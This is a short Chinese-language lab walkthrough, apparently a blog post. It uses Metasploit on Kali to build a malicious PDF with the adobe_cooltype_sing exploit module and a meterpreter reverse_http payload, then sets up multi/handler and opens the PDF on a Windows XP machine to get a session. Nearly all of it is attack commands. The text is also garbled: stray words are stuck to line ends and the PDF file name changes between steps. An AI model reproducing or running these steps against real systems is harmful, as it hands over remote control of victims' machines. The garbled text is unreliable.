IP:kali:192.168.1.102 windowsxp :192.168.1.119windows
msfconsole进入控制台orm
使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块blog
设置攻击载荷payloads ,命令为set payloads windows/meterpreter/reverse_httpit
使用命令show options来肯定须要修改的参数。io
使用命令exploit生成5333.pdfconsole
退出并从新进入msf平台,使用命令 use exploit/multi/handler进入监听模式,设置好参数,执行exploit等待被攻击者的接听。
把生成的5322.pdf移动到winxp里面,并打开form
链接成功pdf